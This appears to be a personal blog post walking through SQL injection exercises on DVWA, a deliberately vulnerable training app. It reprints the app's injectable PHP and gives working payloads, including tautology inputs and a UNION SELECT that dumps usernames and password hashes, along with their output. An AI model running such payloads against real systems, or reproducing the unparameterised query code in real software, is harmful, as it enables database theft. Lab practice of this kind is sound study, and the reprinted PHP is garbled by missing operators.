SQL injection

This time I will tell you a little about sql injection I am studying. I learned to direct practice in DVWA (Damn Vulnerable Web Applicaion). I started from a low level, and here are the php syntax that must be injected :
"
<?php     if(isset($_GET['Submit'])){
    
// Retrieve data
    
$id $_GET['id'];
    
$getid "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
    
$result mysql_query($getid) or die('<pre>' mysql_error() . '</pre>' );
    
$num mysql_numrows($result);
    
$i 0;
    while (
$i $num) {
        
$first mysql_result($result,$i,"first_name");
        
$last mysql_result($result,$i,"last_name");
        echo 
'<pre>';
        echo 
'ID: ' $id '<br>First name: ' $first '<br>Surname: ' $last;
        echo 
'</pre>';
        
$i++;
    }
}
?>

"
at this level no matter what we enter is filtered by the program so that we can enter a query that can cause programs to display all the contents of the database for exemple we can we can insert :
1' or '1'='1
so the sql query to be :
 SELECT first_name, last_name FROM users WHERE user_id = '1' or '1'='1
The following results:
ID: 1' or '1' ='1
   First name: admin
   Surname: admin
ID: 1' or '1' ='1
   First name: Gordon
   Surname: Brown
ID: 1' or '1' ='1
   First name: Hack
   Surname: Me
ID: 1' or '1' ='1
   First name: Pablo
   Surname: Picasso
ID: 1' or '1' ='1
   First name: Bob
   Surname: Smith
this will cause the condition to be true so and cause the application displays all the contents of the database. Low levels has been solved here, now we enter to the medium level and here's a php syntax that we must penetrate to inject the database :
"
<?php if (isset($_GET['Submit'])) {
    
// Retrieve data
    
$id $_GET['id'];
    
$id mysql_real_escape_string($id);
    
$getid "SELECT first_name, last_name FROM users WHERE user_id = $id";
    
$result mysql_query($getid) or die('<pre>' mysql_error() . '</pre>' );
    
$num mysql_numrows($result);
    
$i=0;
    while (
$i $num) {
        
$first mysql_result($result,$i,"first_name");
        
$last mysql_result($result,$i,"last_name");
        echo 
'<pre>';
        echo 
'ID: ' $id '<br>First name: ' $first '<br>Surname: ' $last;
        echo 
'</pre>';
        
$i++;
    }
}
?>

"
at this level there is little filters that cause we can not enter the quotes, but it is not a problem because we do not need it anymore for this syntax. We get through by entering the following syntax
1 or 1=1
so the sql query to be :
 SELECT first_name, last_name FROM users WHERE user_id = 1 or 1=1
ID: 1 or 1=1
   First name: admin
   Surname: admin
ID: 1 or 1=1
   First name: Gordon
   Surname: Brown
ID: 1 or 1=1
   First name: Hack
   Surname: Me
ID: 1 or 1=1
   First name: Pablo
   Surname: Picasso
ID: 1 or 1=1
   First name: Bob
   Surname: Smith
 or by this way :
SELECT first_name, last_name FROM users WHERE user_id = 1 union all select eser,password from users--
ID: 1 union all select user,password from users--
First name: admin
Surname: adminID: 1 union all select user,password from users--
First name: admin
Surname: 900150983cd24fb0d6963f7d28e17f72ID: 1 union all select user,password from users--
First name: gordonb
Surname: e99a18c428cb38d5f260853678922e03ID: 1 union all select user,password from users--
First name: 1337
Surname: 8d3533d75ae2c3966d7e0d4fcc69216bID: 1 union all select user,password from users--
First name: pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7ID: 1 union all select user,password from users--
First name: smithy
Surname: 5f4dcc3b5aa765d61d8327deb882cf99 



at the medium level is not much different from the low level. after graduating from the low and medium level is now high time to enter the territory level, and php source code follows
"
<?php     if (isset($_GET['Submit'])) {
    
// Retrieve data
    
$id $_GET['id'];
    
$id stripslashes($id);
    
$id mysql_real_escape_string($id);
    if (
is_numeric($id)){
        
$getid "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
        
$result mysql_query($getid) or die('<pre>' mysql_error() . '</pre>' );
        
$num mysql_numrows($result);
        
$i=0;
        while (
$i $num) {
            
$first mysql_result($result,$i,"first_name");
            
$last mysql_result($result,$i,"last_name");
            echo 
'<pre>';
            echo 
'ID: ' $id '<br>First name: ' $first '<br>Surname: ' $last;
            echo 
'</pre>';
            
$i++;
        }
    }
}
?>

"
for this high level I have not been able to solve real, but if in a dream I've had 3 times the dream of getting a way to inject the source code.
 

Comments

Popular posts from this blog

Grabbing Proxy With Selenium and Python

Authorization Testing

Bypass HTML Field Restrictions